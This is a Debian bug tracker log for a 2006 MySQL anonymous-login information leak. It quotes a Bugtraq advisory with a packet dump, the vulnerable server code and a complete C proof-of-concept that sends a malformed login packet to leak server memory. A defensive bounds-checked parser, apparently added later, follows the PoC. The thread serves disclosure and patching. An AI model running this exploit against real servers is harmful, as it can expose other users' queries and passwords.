Debian Bug report logs - #366044
SECURITY: MySQL Anonymous Login Handshake - Information Leakage

Package: mysql-server; Maintainer for mysql-server is Debian MySQL Maintainers <pkg-mysql-maint@lists.alioth.debian.org>; Source for mysql-server is src:mysql-5.5.

Reported by: Christian Hammers <ch@debian.org>

Date: Wed, 3 May 2006 20:48:24 UTC

Severity: grave

Tags: security

Found in versions mysql-server/3.23.49-8.14, mysql-server/4.0.24-10sarge1

Fixed in versions mysql-server/4.0.24-10sarge2, mysql-server/3.23.49-8.15

Done: Filipus Klutiero <ido@vif.com>

Bug is archived. No further changes may be made.

Report forwarded to debian-bugs-dist@lists.debian.org:
Bug#365938; Package mysql-server-5.0.

Acknowledgement sent to Christian Hammers <ch@debian.org>:
New Bug report received and forwarded.

Message #5 received at submit@bugs.debian.org:

From: Christian Hammers <ch@debian.org>
To: submit@bugs.debian.org
Subject: SECURITY: MySQL Anonymous Login Handshake - Information Leakage
Date: Wed, 3 May 2006 22:37:04 +0200
[Message part 1 (text/plain, inline)]
Package: mysql-server-5.0
Severity: grave
Justification: user security hole
Tags: security

Affected:
 3.23: unknown    \
 4.0: unknown      } probably DSA needed, I'll have a look
 4.1: yes         /
 5.0: yes, will be fixed by the upcoming 5.0.21 release

In short: By accessing the socket or port 3306 by handcrafted packets, small
parts of the memory can be leaked. Could be enough to sniff a password
though.

bye,

-christian-
[Message part 2 (message/rfc822, inline)]
Subject: [bugtraq] MySQL Anonymous Login Handshake -  Information Leakage.
From: Stefano Di Paola <stefano.dipaola@wisec.it>
To: Bugtraq <bugtraq@securityfocus.com>,
	vulnwatch <vulnwatch@vulnwatch.org>
Date: Tue, 02 May 2006 15:40:02 +0200
Message-Id: <1146577202.5679.216.camel@first>

~.oOOo. Anonymous Login Handshake .oOOo.~
===========================================

MySQL Server (<= 4.1.18, 5.0.20) has an information
leakage in the way mysql parses login packets on anonymous
users (blank password).

Author: Stefano Di Paola
Vulnerable: MySQL <= 4.1.18, 5.0.20
Type of Vulnerability: Local/Remote - input validation - Information
Leakage
Tested On :  Debian 3.1 - IA32.
Vendor Status: Notified on April, 25th 2006, Confirmed on April, 26th
2006, New versions released on 2nd May 2006.
Fixed: Update to 4.0.27, 4.1.19, 5.0.21, 5.1.10 versions.

A Proof of Concept is Attached for this issue.
Tested on: Debian 3.1 - IA32.


A little Note:
To take advantage of these flaws an attacker should have direct access
to MySQL server communication layer (port 3306 or unix socket).
But if used in conjunction with some web application flaws
(i.e. php code injection) an attacker could use socket programming
(i.e. php sockets) to gain access to that layer.

-- Description

By crafting a specifically malformed login packet, initial db name is
filled with uninitialized memory content.


Let's suppose MySql Server has anonymous access.

In fact, if we want to use 'wisecdb' database as user 'wisec' and
password 's' a normal client would send a packet like this:
---------------------------------------------------------------
43  00  00  01  0d  a6  03  00  00  00  00  01  08  00  00  00
00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  00
00  00  00  00  77  69  73  65  63  00  14  aa  69  23  07  2a
ff  99  61  a3  c4  5f  04  66  3b  32  ef  a1  f2  b6  59  77
69  73  65  63  64  62  00
C   .   .   .   .   .   .   .   .   .   .   .   .   .   .   .
.   .   .   .   .   .   .   .   .   .   .   .   .   .   .   .
.   .   .   .   w   i   s   e   c   .   .   .   i   #   .   *
.   .   a   .   .   _   .   f   ;   2   .   .   .   .   Y   w
i   s   e   c   d   b   .
---------------------------------------------------------------

but if we look at the code (MySQL <= 5.0.20)
on sql_parse.cc line ~  993
        function  check_connection(THD *thd):
--
  char *user= end;
  char *passwd= strend(user)+1;
  char *db= passwd;
  char db_buff[NAME_LEN+1];                     // buffer to store db in utf8
  char user_buff[USERNAME_LENGTH+1];            // buffer to store user in utf8
  uint dummy_errors;

  uint passwd_len= thd->client_capabilities & CLIENT_SECURE_CONNECTION ?
    *passwd++ : strlen(passwd);
  db= thd->client_capabilities & CLIENT_CONNECT_WITH_DB ?
    db + passwd_len + 1 : 0;
[1]
  /* Since 4.1 all database names are stored in utf8 */
  if (db)
  {
    db_buff[copy_and_convert(db_buff, sizeof(db_buff)-1,
                             system_charset_info,
                             db, strlen(db),
                             thd->charset(), &dummy_errors)]= 0;
    db= db_buff;
  }

--

It can be noticed that a check for packet construction is missing here [1].

Just replace the null byte at the end of username
'wisec\0' with any other byte like this 'wisec0'.
What happens?

user is assigned to some part of the packet content, and db is assigned
with some (internal) memory beyond packet_length.

so if we send a specific packet we'll get an error message like this:

Access denied for user ''@localhost to database 'lqt'

By changing packet length (db length) and with a little bit of luck a
malicious user could get sensitive information such as parts of queries
and or response executed by some previously logged user.

-

The fix:

bugs are fixed in 4.0.27, 4.1.19, 5.0.21, 5.1.10.
You can download them on http://dev.mysql.com/downloads/


=====================================================

== Anonymous packet information leakage PoC:

my_anon_db_leak.c

  Compile with:
  gcc my_anon_db_leak.c -o my_anon_db_leak

  usage:
  my_anon_db_leak  [-s path/to/socket] [-h hostname_or_ip] [-p port_num] [-n db_len]


Example
$ my_anon_db_leak -s /tmp/mysql.sock -n 20


Regards,

Stefano

-- 

......---oOOo--------oOOo---......
Stefano Di Paola
Software Engineer
Email: stefano.dipaola_at_wisec.it
Email: stefano.dipaola1_at_tin.it
Web: www.wisec.it
..................................

[my_anon_db_leak.c (text/x-csrc, attachment)]

/* ****************************************************************

  April 21st 2006

  my_anon_db_leak.c

  MySql Anonymous Login Memory Leak

  MySql <= 5.0.20

  MySql <= 4.1.x

  copyright 2006 Stefano Di Paola (stefano.dipaola_at_wisec.it)

  GPL 2.0
  ****************************************************************

  Disclaimer:

  In no event shall the author be liable for any damages
  whatsoever arising out of or in connection with the use
  or spread of this information.
  Any use of this information is at the user's own risk.

  ****************************************************************
  Compile with:
  gcc my_anon_db_leak.c -o my_anon_db_leak

  usage:
  my_anon_db_leak [-s path/to/socket] [-h hostname_or_ip] [-p port_num] [-n db_len]


*/


#include <sys/types.h>
/* we need MSG_WAITALL - that's why this ugly #ifdef, why doesn't glibc2
have MSG_WAITALL in its <socketbits.h> ??
*/

#ifdef __linux__
#include <linux/socket.h>
#else
#include <sys/socket.h>
#endif
#include <sys/socket.h>
#include <sys/un.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>		/* isalpha(), used when printing the reply; not included in the posted version */
#include <signal.h>
#include <fcntl.h>
#include <sys/file.h>
#include <errno.h>
#include <unistd.h>
#include <netinet/in.h>		/* sockaddr_in{} and other Internet defns */
#include <netdb.h>		/* needed by gethostbyname */
#include <arpa/inet.h>		/* needed by inet_ntoa */


/* login packet: 3-byte length, seq, caps, max packet, charset, 23 filler bytes,
   user "AAAAAA" with no terminating NUL, 0x14 + 20 password bytes, final NUL */
char anon_pckt[] = {
  0x3d, 0x00, 0x00, 0x01, 0x0d, 0xa6, 0x03, 0x00, 0x00, 0x00, 0x00, 0x01, 0x08, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x14, 0x99, 0xdb, 0x54, 0xb6, 0x6a,
  0xd7, 0xc2, 0x86, 0x4c, 0x50, 0xa8, 0x14, 0xfe, 0x2e, 0x98, 0x27, 0x72, 0x0d, 0xad, 0x45, 0x73,
  0x00
};				// len=16*4+1=65;


int anon_pckt_len = 65;

#define USOCK "/tmp/mysql2.sock"

int
tcp_conn (char *hostname, int port)
{

  int sockfd;
  int n;
  struct sockaddr_in servaddr;

  struct hostent *hp;



  if ((hp = gethostbyname (hostname)) == 0)
    {
      perror ("gethostbyname");
      exit (0);
    }

  if ((sockfd = socket (AF_INET, SOCK_STREAM, 0)) < 0)
    {
      perror ("socket");
      exit (1);
    }

  bzero ((char *) &servaddr, sizeof (servaddr));
  servaddr.sin_family = AF_INET;
  servaddr.sin_port = htons (port);

  memcpy (&servaddr.sin_addr, hp->h_addr, hp->h_length);
  if (servaddr.sin_addr.s_addr <= 0)
    {
      perror ("bad address after gethostbyname");
      exit (1);
    }
  if (connect (sockfd, (struct sockaddr *) &servaddr, sizeof (servaddr)) < 0)
    {
      perror ("connect");
      exit (1);
    }
  return sockfd;
}

int
unix_conn (char *path)
{
  int fd, len;
  struct sockaddr_un sa;

  fd = socket (PF_UNIX, SOCK_STREAM, 0);

  if (fd < 0)
    {
      perror ("cli: socket(PF_UNIX,SOCK_STREAM)");
      exit (1);
    }

  sa.sun_family = AF_UNIX;
  strcpy (sa.sun_path, path);
  len = sizeof (sa);
  if (connect (fd, (struct sockaddr *) &sa, len) < 0)
    {
      perror ("cli: connect()");
      exit (1);
    }
  return fd;
}

int
main (int argc, char *argv[])
{
  int fd;
  int i, ret;
  char packet[65535];
  char *path;
  char *host;
  int port = 3306;
  char buf[65535];
  int db_len = 0;
  int pckt_len = anon_pckt_len;
  int unix_sock = 1;
  int c;			/* getopt() returns int; a plain char cannot hold -1 where char is unsigned */

  path = strdup (USOCK);
  host = strdup ("127.0.0.1");

  opterr = 0;

  while ((c = getopt (argc, argv, "s:h:p:n:")) != -1)
    switch (c)
      {
      case 's':
	path = strdup (optarg);
	unix_sock = 1;
	break;
      case 'h':
	host = strdup (optarg);
	unix_sock = 0;
	break;
      case 'p':
	port = atoi (optarg);
	unix_sock = 0;
	break;
      case 'n':
	db_len = atoi (optarg);
	break;

      default:
	break;
      }


  bzero (packet, 65535);

  pckt_len = anon_pckt_len + db_len;
  printf ("%d\n", pckt_len);

  for (i = 0; i < pckt_len; i++)
    packet[i] = anon_pckt[i];

  if (db_len)
    for (i = anon_pckt_len - 2; i < pckt_len; i++)
      packet[i] = 'A';

  packet[pckt_len - 1] = '\0';

  /* patch the 3-byte little-endian body length in the packet header */
  packet[0] = (char) (anon_pckt[0] + db_len) & 0xff;
  packet[1] = (char) ((anon_pckt[0] + db_len) >> 8) & 0xff;
  for (i = 0; i < pckt_len; i++)
    printf (" %.2x%c", (unsigned char) packet[i],
	    ((i + 1) % 16 ? ' ' : '\n'));
  printf ("\n");


  if (unix_sock)
    fd = unix_conn (path);
  else
    fd = tcp_conn (host, port);

  sleep (1);
  ret = recv (fd, buf, 65535, 0);	/* server greeting */
  if (send (fd, packet, pckt_len, 0) != pckt_len)
    {
      perror ("cli: send(anon_pckt)");
      exit (1);
    }

  ret = recv (fd, buf, 65535, 0);	/* error reply carrying the db name */
  for (i = 0; i < ret; i++)
    printf ("%c", (isalpha (buf[i]) ? buf[i] : '.'));
  printf ("\n");
  return 0;
}


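The missing check the advisory marks as [1] is easiest to see by parsing the same login packet with explicit length accounting. The following is an added example written for this page; it is not MySQL's code and not part of the advisory or the PoC. It parses the 4.1-style login packet layout the advisory walks through (capability flags, max packet size, charset, 23 filler bytes, NUL-terminated user, length-prefixed password when CLIENT_SECURE_CONNECTION is set, NUL-terminated database when CLIENT_CONNECT_WITH_DB is set) and rejects any packet whose terminators or length fields fall outside the bytes actually received. The struct and function names and the NAME_MAX_LEN cap are assumptions; the normal packet is the one in the advisory's hex dump, and the malformed one is derived from it by replacing the NUL after 'wisec' with '0' as the advisory describes. Where the quoted server code would take *passwd++ and db from memory past the end of the packet, this parser returns an error code instead.

```c
/* Added example, not MySQL source and not part of the advisory: a bounds-checked parser
 * for the 4.1-style login packet the advisory walks through.  Names are assumptions. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define CLIENT_CONNECT_WITH_DB   0x00000008UL   /* MySQL protocol capability bits */
#define CLIENT_SECURE_CONNECTION 0x00008000UL
#define NAME_MAX_LEN 64                         /* assumption: cap on user/db copies */

struct auth_fields { uint32_t caps; size_t passwd_len; char user[NAME_MAX_LEN + 1]; char db[NAME_MAX_LEN + 1]; };

/* Copy a NUL-terminated string whose terminator must lie inside the n bytes at p.
 * Returns 0 and the bytes consumed (string + NUL), or -1 if no NUL is in range or
 * the string does not fit dst.  This stands in for the unchecked strend(). */
static int copy_cstring(const unsigned char *p, size_t n, char *dst, size_t dst_sz, size_t *consumed)
{
    const unsigned char *nul = memchr(p, 0, n);
    size_t len;
    if (nul == NULL) return -1;
    len = (size_t)(nul - p);
    if (len >= dst_sz) return -1;
    memcpy(dst, p, len);
    dst[len] = '\0';
    *consumed = len + 1;
    return 0;
}

/* Parse a full packet (4-byte header + body).  Returns 0 on success or a negative code
 * naming the check that failed; no field is ever read past the body length. */
int parse_auth_packet(const unsigned char *pkt, size_t pkt_len, struct auth_fields *out)
{
    const unsigned char *p;
    size_t body_len, n, consumed;

    memset(out, 0, sizeof *out);
    if (pkt_len < 4) return -1;                                  /* no header */
    body_len = (size_t)pkt[0] | ((size_t)pkt[1] << 8) | ((size_t)pkt[2] << 16);
    if (body_len + 4 > pkt_len) return -2;                       /* header claims bytes never received */
    p = pkt + 4;
    n = body_len;
    if (n < 32) return -3;              /* caps(4) + max_packet(4) + charset(1) + filler(23) */
    out->caps = (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
    p += 32; n -= 32;

    /* user: with 'wisec0' the only NUL left is the packet's last byte, so the whole
     * remainder becomes the user name and nothing is left for the fields after it */
    if (copy_cstring(p, n, out->user, sizeof out->user, &consumed) != 0) return -4;
    p += consumed; n -= consumed;

    if (out->caps & CLIENT_SECURE_CONNECTION) {
        if (n < 1) return -5;                   /* length byte past the end: the *passwd++ read at [1] */
        out->passwd_len = p[0];
        p += 1; n -= 1;
        if (out->passwd_len > n) return -6;     /* password runs past the end */
        p += out->passwd_len; n -= out->passwd_len;
    } else {
        const unsigned char *nul = memchr(p, 0, n);
        if (nul == NULL) return -5;
        out->passwd_len = (size_t)(nul - p);
        p = nul + 1; n -= out->passwd_len + 1;
    }

    if ((out->caps & CLIENT_CONNECT_WITH_DB) &&
        copy_cstring(p, n, out->db, sizeof out->db, &consumed) != 0)
        return -7;                              /* db name not terminated inside the body */
    return 0;
}

/* The normal 'wisec' / 'wisecdb' login packet from the advisory's hex dump. */
static const unsigned char normal_login_pkt[] = {
    0x43,0x00,0x00,0x01, 0x0d,0xa6,0x03,0x00, 0x00,0x00,0x00,0x01, 0x08,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00, 0x77,0x69,0x73,0x65, 0x63,0x00,0x14,0xaa, 0x69,0x23,0x07,0x2a,
    0xff,0x99,0x61,0xa3, 0xc4,0x5f,0x04,0x66, 0x3b,0x32,0xef,0xa1, 0xf2,0xb6,0x59,0x77,
    0x69,0x73,0x65,0x63, 0x64,0x62,0x00
};

int parse_normal(struct auth_fields *f) { return parse_auth_packet(normal_login_pkt, sizeof normal_login_pkt, f); }

/* Same packet with the NUL after "wisec" (offset 41) replaced by '0', as the advisory describes. */
int parse_mutated(struct auth_fields *f)
{
    unsigned char buf[sizeof normal_login_pkt];
    memcpy(buf, normal_login_pkt, sizeof buf);
    buf[41] = '0';
    return parse_auth_packet(buf, sizeof buf, f);
}

int main(void)
{
    struct auth_fields f;
    int rc = parse_normal(&f);
    printf("normal:  rc=%d user='%s' db='%s' passwd_len=%zu\n", rc, f.user, f.db, f.passwd_len);
    rc = parse_mutated(&f);
    printf("mutated: rc=%d, rejected instead of reading past the packet\n", rc);
    return 0;
}
```

The normal packet parses to user 'wisec', a 20-byte password and db 'wisecdb' with capability flags 0x0003a60d (CLIENT_CONNECT_WITH_DB and CLIENT_SECURE_CONNECTION both set, matching the branches the quoted server code takes). The mutated packet fails with -5: after the user string has swallowed everything up to the packet's last byte, there is no byte left to read as the password length, which is exactly the read the server performed from uninitialized memory. Truncating the buffer below what the header announces fails with -2, the case a network layer has to handle before any field is touched.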
Reply sent to Filipus Klutiero <ido@vif.com>:
You have taken responsibility.

Notification sent to Christian Hammers <ch@debian.org>:
Bug acknowledged by developer.

Message #10 received at 365938-done@bugs.debian.org:

From: Filipus Klutiero <ido@vif.com>
To: 365938-done@bugs.debian.org
Subject: Fixed
Date: Thu, 04 May 2006 05:22:58 -0400
Version: 5.0.21-1

It seems that a typo in 5.0.21-1's changelog kept this bug from being 
automatically closed:

mysql-dfsg-5.0 (5.0.21-1) unstable; urgency=high
.
* SECURITY: New upstream release with some security relevant bugfixes:
* "Anonymous Login Handshake - Information Leakage"
* "COM_TABLE_DUMP Information Leakage and Arbitrary command execution"
Closes: #365939 
<http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=365939>, #365939 
<http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=365939>



Bug 365938 cloned as bugs 366043, 366044. Request was from Christian Hammers <ch@debian.org> to control@bugs.debian.org.

Bug reassigned from package `mysql-server-5.0' to `mysql-server'. Request was from Christian Hammers <ch@debian.org> to control@bugs.debian.org.

Bug marked as found in version 3.23.49-8.14. Request was from Christian Hammers <ch@debian.org> to control@bugs.debian.org.

Bug marked as found in version 4.0.24-10sarge1. Request was from Christian Hammers <ch@debian.org> to control@bugs.debian.org.

Bug reopened, originator not changed. Request was from Filipus Klutiero <ido@vif.com> to control@bugs.debian.org.

Information forwarded to debian-bugs-dist@lists.debian.org, Christian Hammers <ch@debian.org>:
Bug#366044; Package mysql-server.

Acknowledgement sent to sean finney <seanius@debian.org>:
Extra info received and forwarded to list. Copy sent to Christian Hammers <ch@debian.org>.

Message #25 received at 366044@bugs.debian.org:

From: sean finney <seanius@debian.org>
To: ch@debian.org
Cc: 366049@bugs.debian.org, 366044@bugs.debian.org, 366163@bugs.debian.org
Subject: mysql woody/3.23 done
Date: Sun, 7 May 2006 07:43:48 -0400
[Message part 1 (text/plain, inline)]
hey christian,

just fyi to keep things fully documented, i've backported the relevant
patches for all 4 CVE's to the woody/3.23 version of mysql.

i've been able to verify that the vulnerabilities exist, and are
exploitable by modifying the posted PoC code from the OP.  i've
also been able to verify that the patch fixes the problem
in the way it's supposed to.

everything is available at:

	http://people.debian.org/~seanius/mysql/woody/

including the following files:

- CVE-2006-0903.pl: basic perl based exploit.
- CVE-2006-1516_mysql-3.23.c: modified version of OP's PoC.
- CVE-2006-1517.c: modified version of OP's PoC.

and of course:

- mysql_3.23.49-8.15.diff.gz
- mysql_3.23.49-8.15.dsc   

i'll see about hacking on the sarge versions tonight.

	sean

-- 
[signature.asc (application/pgp-signature, inline)]

Bug marked as not found in version 3.23.49-8.15. Request was from Christian Hammers <ch@debian.org> to control@bugs.debian.org.

Reply sent to Filipus Klutiero <ido@vif.com>:
You have taken responsibility.

Notification sent to Christian Hammers <ch@debian.org>:
Bug acknowledged by developer.

Message #32 received at 366044-done@bugs.debian.org:

From: Filipus Klutiero <ido@vif.com>
To: 366044-done@bugs.debian.org
Subject: Fixed
Date: Mon, 29 May 2006 09:01:49 -0400
close 366044 4.0.24-10sarge2
close 366044 3.23.49-8.15



Information forwarded to debian-bugs-dist@lists.debian.org, Christian Hammers <ch@debian.org>:
Bug#366044; Package mysql-server.

Acknowledgement sent to Filipus Klutiero <ido@vif.com>:
Extra info received and forwarded to list. Copy sent to Christian Hammers <ch@debian.org>.

Message #37 received at 366044@bugs.debian.org:

From: Filipus Klutiero <ido@vif.com>
To: control@bugs.debian.org
Cc: 366044@bugs.debian.org
Subject: Fixed
Date: Mon, 29 May 2006 09:02:51 -0400
close 366044 4.0.24-10sarge2
close 366044 3.23.49-8.15
thanks

Doh for previous message.



Bug marked as fixed in version 4.0.24-10sarge2, send any further explanations to Christian Hammers <ch@debian.org>. Request was from Filipus Klutiero <ido@vif.com> to control@bugs.debian.org.

Bug marked as fixed in version 3.23.49-8.15, send any further explanations to Christian Hammers <ch@debian.org>. Request was from Filipus Klutiero <ido@vif.com> to control@bugs.debian.org.

Bug marked as not found in version 3.23.49-8.15. Request was from Christian Hammers <ch@debian.org> to control@bugs.debian.org.

Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Mon, 25 Jun 2007 10:25:13 GMT)


Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Apr 16 17:08:35 2014; Machine Name: beach.debian.org

Debian Bug tracking system
Copyright (C) 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson.